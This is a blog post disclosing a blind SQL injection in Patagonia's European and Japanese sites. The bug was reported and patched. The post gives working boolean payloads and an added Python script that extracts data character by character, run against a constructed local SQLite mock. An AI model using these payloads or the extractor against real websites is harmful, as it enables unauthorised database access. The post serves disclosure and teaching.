Wednesday, November 16, 2016

SQL Injection in Patagonia (European and Japanese) Websites

Hello,

I am a nineteen year old security researcher, who is heavily involved in bug bounties and computer programming. While browsing the European website of Patagonia (eu.patagonia.com) in the fall of 2016, I noticed a GET parameter (?k=) behaving oddly. So I entered a standard ' mark to see how it would respond. Here is what I saw:




This piqued my interest, and I started to think this website would be vulnerable to SQL injection. I began messing with it and attempted to create a POC of SQL injection. I noticed that when I entered two ' marks, no error would appear and the page would load:




After playing with it for a while longer, I was able to finally craft a working payload! Here it is:

' and substring('a',1,1) like 'a' and 'A' like 'A

returns true (displays an image of a sweater):





' and substring('b',1,1) like 'a' and 'A' like 'A

returns false and displays no image:


Now we can use this as a boolean oracle to retrieve information such as the name of the current database. Each request tests a single character: substring() pulls out the character at one position of the target string, LIKE compares it with a guess, and the page (image or no image) tells you whether the guess was right. To find the second character, keep cycling through the same guesses but increment the position argument of substring() from 1 to 2, and so on for every following position. Two caveats when doing this with LIKE: the characters _ and % are LIKE wildcards (so try them last, or you will get a false match), and on a default MySQL collation the comparison is case-insensitive, so the letter case you recover is not reliable.

Syntax: ' and substring(database(),1,1) like 'w' and 'A' like 'A



Result: www_patagonia_com
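Here is the character-by-character extraction the post describes, written out as an added Python example; it is not code from the post or from Patagonia's site. It stands up an in-memory SQLite table as a constructed stand-in for the vulnerable ?k= search, so MySQL's substring() becomes SQLite's substr() and database() is replaced by a value read from a constructed config table. It also assumes the application appends %' after the parameter, which is what lets the trailing 'A' like 'A in the payload close the query cleanly.

```python
import sqlite3
import string

# Constructed stand-in for the vulnerable search backend (not Patagonia's code).
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE products (sku TEXT, name TEXT, image TEXT);
INSERT INTO products VALUES ('P1', 'Better Sweater', 'sweater.jpg'),
                            ('P2', 'Nano Puff Jacket', 'jacket.jpg');
-- Stands in for MySQL's database(); the value is constructed to match the post.
CREATE TABLE config (name TEXT, value TEXT);
INSERT INTO config VALUES ('site_db', 'www_patagonia_com');
""")


def vulnerable_search(k: str) -> list:
    """The ?k= handler as the post implies it behaved: the parameter is spliced
    straight into the LIKE pattern, so a stray ' breaks the query (assumption:
    the app wraps the value in %...%)."""
    sql = "SELECT image FROM products WHERE name LIKE '%" + k + "%'"
    return [row[0] for row in DB.execute(sql)]


def breaks_query(k: str) -> bool:
    """Reproduces the author's first two probes: a single ' raises a syntax
    error, while '' is an escaped quote inside the string literal and loads."""
    try:
        vulnerable_search(k)
        return False
    except sqlite3.OperationalError:
        return True


def oracle(condition: str) -> bool:
    """One boolean-blind probe using the post's payload shape:
    ' and <condition> and 'A' like 'A   (app appends %' -> 'A' like 'A%' is true).
    Returns True when the page would show a product image."""
    payload = "' and " + condition + " and 'A' like 'A"
    try:
        return bool(vulnerable_search(payload))
    except sqlite3.OperationalError:
        return False


# Hypothetical target expression standing in for database().
SECRET_EXPR = "(select value from config where name='site_db')"

# Candidate characters. '_' is a LIKE wildcard (matches any single character),
# so it must be tried last or every position would "match" it.
ALPHABET = string.ascii_lowercase + string.digits + "-." + "_"


def extract(expr: str, max_len: int = 64) -> str:
    """Recover expr one character at a time. The position argument of substr()
    is what increments; the guess loop is the same for every position."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop cleanly at the end of the string instead of matching '' forever.
        if oracle(f"length({expr}) < {pos}"):
            break
        for ch in ALPHABET:
            if oracle(f"substr({expr},{pos},1) like '{ch}'"):
                result += ch
                break
        else:
            result += "?"  # character outside the candidate set
    return result


if __name__ == "__main__":
    print("single quote breaks query:", breaks_query("'"))
    print("double quote loads:", not breaks_query("''"))
    print("recovered:", extract(SECRET_EXPR))
```

Because LIKE in both SQLite and default-collation MySQL is case-insensitive, the loop only ever guesses lowercase; if letter case matters, switch the comparison to an equality test against a binary/case-sensitive collation instead of LIKE.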


This also affected the Japanese site!!



After discovering this flaw, I immediately reached out to Patagonia, who patched the bug both quickly and effectively. Finding vulnerabilities and helping American companies is my passion, and I plan on making a career of it one day. Let me know what your thoughts/opinions are in the comments! Thanks :)



Jake Murphy
jakedmurphy1@gmail.com

